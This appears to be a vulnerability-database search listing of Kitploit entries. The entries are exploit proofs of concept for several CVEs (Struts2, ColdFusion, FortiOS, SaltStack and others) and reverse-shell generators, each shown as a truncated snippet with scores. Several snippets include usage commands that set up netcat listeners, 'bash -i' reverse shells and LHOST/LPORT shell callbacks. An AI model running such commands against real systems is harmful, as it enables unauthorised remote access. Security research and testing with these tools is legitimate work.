Lucene search
+L

2537 matches found

Kitploit
Kitploit
added 2026/09/22 7:59 a.m.20 views

One-Lin3r

One-Lin3r One-Lin3r es un framework simple, modular y ligero que te proporciona todos los one-liners que necesitarás durante pruebas de penetración sistemas Windows, Linux, macOS o incluso BSD o hacking en general, con muchas funciones nuevas para automatizar todo esto por completo por ejemplo, n...

6.4AI score
SaveExploits0References3
Kitploit
Kitploit
added 2026/09/22 7:52 a.m.10 views

CVE-2018-11776

CVE-2018-11776 Environment for CVE-2018-11776 / S2-057 Demo Run server root@kitploit: $ docker run -d --hostname struts2 --name cve-2018-11776 -p 30080:8080 knqyf263/cve-2018-11776 Exploit root@kitploit: $ nc -l 10000 or nc -lp 10000 root@kitploit: $ python3 exploit.py localhost:30080 'bash -i &...

9.3CVSS8.6AI score0.99991EPSS
SaveExploits42
Kitploit
Kitploit
added 2026/09/22 7:50 a.m.11 views

ShellPop

ShellPop Acerca de ShellPop se trata de generar shells. Con esta herramienta puedes crear comandos de shell reversa o bind de manera fácil y sofisticada para ayudarte durante las pruebas de penetración. ¡No pierdas más tiempo con archivos .txt almacenando tus shells reversas! Instalación Se...

6.2AI score
SaveExploits0References3
Kitploit
Kitploit
added 2026/09/22 7:47 a.m.12 views

ColdFusion_EXp

CVE-2023-29298/CVE-2023-26360 Vulnerability Exploitation Reverse Shell Tool Introduction The vulnerability principle is that when we construct CFML data, the client's request data is saved to the server's coldfusion-out.log. This directory records error information from requests. The...

9.8CVSS8AI score0.99798EPSS
SaveExploits13
Kitploit
Kitploit
added 2026/09/22 7:43 a.m.12 views

poc-cve-2023-2868

CVE-2023-2868: Barracuda ESG Command Injection For full details, read our AttackerKB Analysis. Usage Set LHOST and RHOST variables to your listener. ruby poccve20232868.rb This will spawn a reverse shell...

9.8CVSS8.6AI score0.87691EPSS
SaveExploits3
Kitploit
Kitploit
added 2026/09/22 7:41 a.m.8 views

EXP_CVE-2018-19518

CVE-2018-19518 Disclaimer This program should only be used for authorized security testing and research. Please use it in compliance with network security laws. The author is not responsible for any illegal attacks or other unlawful actions resulting from the use of this tool. Usage root@kitploit...

8.5CVSS7.2AI score0.9523EPSS
SaveExploits5
Kitploit
Kitploit
added 2026/09/22 7:32 a.m.8 views

CVE-2020-24186_reverse_shell_upload

CVE-2020-24186 reverse shell upload Exploit for WpDiscuz 7.0.4 based on the the exploit written by h3v0x. Exploits the vulnerability and uploads a reverse PHP shell. Inspiration was the Blogger CTF. exploit.py -u http://192.168.1.81/blog -p /wordpress/2021/06/blogpost -l '192.168.1.9' -s 9001...

10CVSS8.2AI score0.94616EPSS
SaveExploits19References1
Kitploit
Kitploit
added 2026/09/22 7:23 a.m.10 views

CVE-2021-29200

CVE-2021-29200 CVE-2021-29200 EXP can successfully get a reverse shell This article and tool are for technical sharing only. Strictly prohibited for illegal use. Any consequences arising from misuse shall be borne by the user. Trigger Command Execution EXP 1. Start RMI listener on VPS port 9999...

9.8CVSS8.6AI score0.5537EPSS
SaveExploits0
Kitploit
Kitploit
added 2026/09/22 7:22 a.m.8 views

CVE-2019-0708-Windows

CVE-2019-0708-Windows This article will share the Windows Remote Desktop Service vulnerability CVE-2019-0708, and provide a detailed explanation of the vulnerability and defensive measures. As a cybersecurity beginner, the author shares some self-study basic tutorials, mainly online notes about...

10CVSS8.2AI score0.99999EPSS
SaveExploits126
Kitploit
Kitploit
added 2026/09/22 7:21 a.m.9 views

CVE-2025-3243

CVE-2025-32433 Erlang SSH Library Exploit A proof-of-concept exploit for CVE-2025-32433 , a critical vulnerability in Erlang's SSH library that allows pre-authenticated code execution via malformed SSHMSGCHANNELREQUEST packets. Features Original exploit by Matthew Keeley Updated version by Tyler...

10CVSS7.8AI score0.98754EPSS
SaveExploits40
Kitploit
Kitploit
added 2026/09/22 7:16 a.m.11 views

CVE-2021-21315

the CVE-2021-21315's exploit code wrote with Rust lang I'm rust noob so this code was my part of RustLang practices Yes!!Let's Get the reverse shell!!!!!!!!!! !for education or researching only Build root@kitploit: cargo build Usage root@kitploit: ./exploit ./exploit...

7.8CVSS7.7AI score0.90675EPSS
SaveExploits4
Kitploit
Kitploit
added 2026/09/22 7:13 a.m.17 views

WPForce

WPForce - Suite de Ataque a WordPress ACERCA DE: WPForce es un conjunto de herramientas de ataque a WordPress. Actualmente contiene 2 scripts: WPForce, que fuerza bruta inicios de sesión a través de la API, y Yertle, que sube shells una vez que se han encontrado credenciales de administrador...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/22 7:10 a.m.11 views

CVE-2024-21762_FortiNet_PoC

CVE-2024-21762FortiNetPoC Proof-of-concept scanner targeting CVE-2024-21762 in FortiOS SSL VPN’s /remote/hostcheckvalidate endpoint with reverse shell payload delivery. Here’s a GitHub-style writeup for your project, including a clean and concise summary, a usage guide, and context on how it fits...

9.8CVSS8.8AI score0.83428EPSS
SaveExploits14
Kitploit
Kitploit
added 2026/09/22 7:10 a.m.8 views

SaltStack-Exp

SaltStack-Exp CVE-2020-11651&&CVE-2020-11652 EXP root@kitploit: Exec-Master: python exp.py --exec-choose master --exec-cmd "whoami" Exec-Minions: python exp.py --exec-choose minions --exec-cmd "whoami" GetShell: python exp.py --shell-LHOST 8.8.8.8 --shell-LPORT 4444 ReadFile: python exp.py --read...

9.8CVSS8AI score0.96614EPSS
SaveExploits23
Kitploit
Kitploit
added 2026/09/22 7:07 a.m.12 views

php-reverse-shell

PHP Reverse Shell Just a little refresh on the popular PHP reverse shell script pentestmonkey/php-reverse-shell. Credits to the original author! Works on Linux OS and macOS with /bin/sh and Windows OS with cmd.exe. Script will automatically detect the underlying OS. Works with both, ncat and...

5.9AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/22 6:54 a.m.10 views

JSshell

JSshell - versión 3.1 JSshell - un reverse shell de JavaScript. Se utiliza para ejecutar código JS de forma remota, explotar XSS ciego, ... Requisitos: Cualquier sistema operativo + Python 2 o Python 3 Novedades en JSshell versión 3.1 Actualizado en la nueva versión de JSshell 3.1: Nuevo comando...

6AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/22 6:43 a.m.39 views

mediator

Mediator is an end-to-end encrypted reverse shell in which the operator and the shell connect to a "mediator" server that bridges the connections. This removes the need for the operator/handler to set up port forwarding in order to listen for the connection. Mediator also allows you to create...

6AI score
SaveExploits0References4
Kitploit
Kitploit
added 2026/09/22 6:43 a.m.12 views

mediator

Mediator es una shell reversa cifrada de extremo a extremo en la que el operador y la shell se conectan a un servidor "mediador" que puentea las conexiones. Esto elimina la necesidad de que el operador/controlador configure el redireccionamiento de puertos para escuchar la conexión. Mediator...

5.8AI score
SaveExploits0References4
Kitploit
Kitploit
added 2026/09/22 6:41 a.m.16 views

s2-062

s2-062 Remote Code Execution S2-062 CVE-2021-31805 Verification POC Verification method vulfocus range issue The poc inside validates against the s2-061 range, with the parameter id; the new range uses the parameter name The main reason for identifying it as id is that I can't think of any good...

9.8CVSS7.9AI score0.85433EPSS
SaveExploits7
Kitploit
Kitploit
added 2026/09/22 6:40 a.m.11 views

QuasarNix

QuasarNix: Adversarially Robust Living-off-the-Land Reverse-Shell Detection Dmitrijs Trizna · Luca Demetrio · Battista Biggio · Fabio Roli Overview Linux living-off-the-land LOTL reverse shells abuse legitimate binaries bash, python, nc, … to establish covert outbound connections, making...

5.9AI score
SaveExploits0
Rows per page
Query Builder